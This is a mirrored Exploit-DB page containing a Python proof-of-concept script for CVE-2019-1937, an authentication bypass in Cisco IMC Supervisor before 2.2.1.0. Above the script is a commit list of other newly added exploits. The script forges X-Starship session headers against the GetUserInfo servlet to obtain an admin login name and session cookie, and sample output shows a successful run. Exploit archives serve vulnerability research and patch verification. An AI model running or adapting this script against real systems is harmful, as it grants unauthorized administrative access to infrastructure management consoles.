bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/webapps/51589.txt
Exploit-DB fd788a92e3 DB: 2023-07-16 
9 changes to exploits/shellcodes/ghdb

Cisco UCS-IMC Supervisor 2.2.0.0 - Authentication Bypass

Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)

Admidio v4.2.10 - Remote Code Execution (RCE)
Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)
Bus Pass Management System 1.0 - 'viewid' SQL Injection
Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)
Bus Pass Management System 1.0 - 'viewid' SQL Injection

Icinga Web 2.10 - Authenticated Remote Code Execution

News Portal v4.0 - SQL Injection (Unauthorized)

Pluck v4.7.18 - Remote Code Execution (RCE)

ProjeQtOr Project Management System v10.4.1 - Multiple XSS

WinterCMS < 1.2.3 - Persistent Cross-Site Scripting

XAMPP 8.2.4 - Unquoted Path
2023-07-16 00:16:39 +00:00

64 lines
No EOL
2.2 KiB
Text
Raw Permalink Blame History

[+] Exploit Title: Cisco UCS-IMC Supervisor 2.2.0.0 - Authentication Bypass
[+] Cisco IMC Supervisor - < 2.2.1.0
[+] Date: 08/21/2019
[+] Affected Component: /app/ui/ClientServlet?apiName=GetUserInfo
[+] Vendor: https://www.cisco.com/c/en/us/products/servers-unified-computing/integrated-management-controller-imc-supervisor/index.html
[+] Vulnerability Discovery : Pedro Ribeiro
[+] Exploit Author: Fatih Sencer
[+] CVE: CVE-2019-1937
----------------------------------------------------
Usage:
./python3 CiscoIMC-Bypass.py -u host
[+] Target https://xxxxxx.com
[+] Target OK
[+] Exploit Succes
[+] Login name : admin
[+] Cookie : REACTED
"""
import argparse,requests,warnings,base64,json,random,string
from requests.packages.urllib3.exceptions import InsecureRequestWarning
warnings.simplefilter('ignore',InsecureRequestWarning)
def init():
parser = argparse.ArgumentParser(description='Cisco IMC Supervisor / Authentication Bypass')
parser.add_argument('-u','--host',help='Host', type=str, required=True)
args = parser.parse_args()
exploit(args)
def exploit(args):
session = requests.Session()
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_4)",
"X-Requested-With": "XMLHttpRequest",
"Referer": "https://{}/".format(args.host),
"X-Starship-UserSession-Key": ''.join(random.choices(string.ascii_uppercase + string.digits, k=10)),
"X-Starship-Request-Key": ''.join(random.choices(string.ascii_uppercase + string.digits, k=10))
}
target = "https://{}/app/ui/ClientServlet?apiName=GetUserInfo".format(args.host)
print("[+] Target {}".format(args.host))
exp_send = session.get(target, headers=headers, verify=False, timeout=10)
if exp_send.status_code == 200:
print("[+] Target OK")
body_data = json.loads(exp_send.text)
if not (body_data.get('loginName') is None):
print("[+] Exploit Succes")
print("[+] Login name : {}".format(body_data.get('loginName')))
print("[+] Cookie : {}".format(session.cookies.get_dict()))
else:
print("[-] Exploit Failed")
else:
print("[-] N/A")
exit()
if __name__ == "__main__":
init()
Reference in a new issue View git blame Copy permalink